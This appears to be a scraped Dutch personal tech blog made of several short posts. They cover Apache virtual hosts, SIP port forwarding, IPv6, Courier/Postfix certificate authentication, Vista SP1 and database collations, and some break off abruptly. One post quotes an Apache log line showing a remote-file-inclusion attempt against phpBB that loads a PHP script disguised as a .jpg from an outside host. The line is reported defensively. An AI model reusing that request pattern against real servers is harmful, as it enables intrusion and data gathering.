Al enige tijd had ik last van een raar probleem in Apache. Bij twee websites werd bij het intikken van een niet bestaand subdomein een totaal andere site getoond. Iets wat anderen ook al opgevallen is. Bij andere sites die op dezelfde server staan gebeurde dit niet. Na lang zoeken ben ik er achter gekomen dat bij de 2 specifieke sites de eerste site wordt getoond die in de directory /etc/apache2/sites-available staat.
Het heeft even geduurd, maar ik heb het werkend gekregen. Eerder had Henk het al werkend voor accounts via Ekiga. De regel in het modem heb ik toegevoegd, echter het werkte nog steeds niet voor mijn voip account bij Xs4all. Blijkt dus dat ik poort 5060 moet openzetten:
Connection unbind application=SIP port=5060
> Saveall Nu had ik dat al een keer eerder gedaan, maar door de firmware upgrade was die wijziging weer ongedaan gemaakt.
Omdat ik mijn pc opnieuw heb geïnstalleerd – teveel geëxperimenteerd – moest ik de instellingen voor ipv6 ook opnieuw maken. Nu was ik in de veronderstelling dat ik het ergens had opgeschreven, maar kon het nergens meer terug vinden. Daarom nu maar even.
Installatie van het pakket libnet6 was voldoende om de dansende schildpad te laten zien. Natuurlijk moest er wel een stukje in /etc/network/interfaces worden toegevoegd, maar die instellingen zijn terug te vinden in het service center.
Na de hackpoging via de Bayer site kwam ik er vandaag weer eentje tegen in de logs. Ditmaal via een andere site, maar met dezelfde truc. Een php-script verpakt als jpg. Uiteraard heb ik de bewuste site-eigenaar een mailtje gestuurd om hem/haar op de hoogte te brengen van het misbruik via de site.
Ditmaal heb ik echter ook de provider van de aanvaller – Xs4all in dit geval – een mailtje gestuurd.
In de logs van Apache kwam ik een aantal keer de volgende regel tegen:
"GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 301 341 "-" "libwww-perl/5.810" Nu komen dit soort regels vaker voor. Het bestand wing.jpg is in dit geval geen plaatje maar een scriptje dat allerlei gegevens uitleest en op het scherm toont. Met deze info hopen ze voldoende te krijgen om de server te hacken.
Dat gaat gelukkig bij mij niet lukken. Nu heb ik de whois opgevraagd van iqmm.
Eerder was ik er al mee bezig geweest, maar toen ging het vooral om de controle voor het verzenden van mail. Voor het lezen van de mail in Thunderbird gebruikte ik nog steeds een wachtwoord. Achteraf gezien is het wel logisch dat het voor Courier niet uitmaakt of je nu mail verzendt of ophaalt, het gaat ten slotte om de authentificatie.
Bij wijze van test heb ik het wachtwoord dat in Thunderbird is opgeslagen verwijderd.
Nu het inloggen met een certificaat om mail te versturen werkt is de volgende stap het aanzetten van de controle van de certifcaten. Grofweg zijn er twee mogelijkheden:
Eigenlijk zijn er dus twee manieren om een certificaat te controleren:
via Postfix via de imap-ssl module van Courier Via Postfix Een manier om aan te geven welke certificaten mail mogen versturen is in de main.cf van Postfix het toevoegen van de regel:
Mijn eerdere pogingen om sp1 te installeren op een HP laptop zijn hopeloos mislukt. Nu zou ik wel zonder sp1 kunnen, ware het niet dat na het verwijderen van sp1 de netwerkkaart nog steeds niet werkte. Er zat dus niets anders op dan de laptop opnieuw te installeren. Verrassend genoeg kon ik nu wel zonder problemen sp1 installeren.
Nu heb ik helaas alleen een recovery cd en geen volledige installatie dvd.
Vorige week was het dan zover, service pack 1 van Vista werd via windows update aangeboden op mijn Hewlett-Packard laptop. Natuurlijk heb ik gelijk aangegeven dat ik die wou hebben. Ongeveer een uurtje later was het geheel klaar en kon ik inloggen.
Alleen jammer dat de netwerkverbinding totaal niet meer werkt. Ben nu al enkele dagen bezig om te achterhalen waar het door komt, maar ik ben nog geen steek verder.
Karaktersets en collation in een database, het is altijd weer lastig met al die rare tekens die we in onze woorden hebben. Zo moest ik laatst een backup terugzetten van de database – mislukt experimentje – en daarna werden alle tekens met accenten niet goed weergegeven. Dat het een lastig iets is, wordt wel bewezen door het ticket dat al meer dan een jaar geleden is aangemaakt en nog steeds open staat.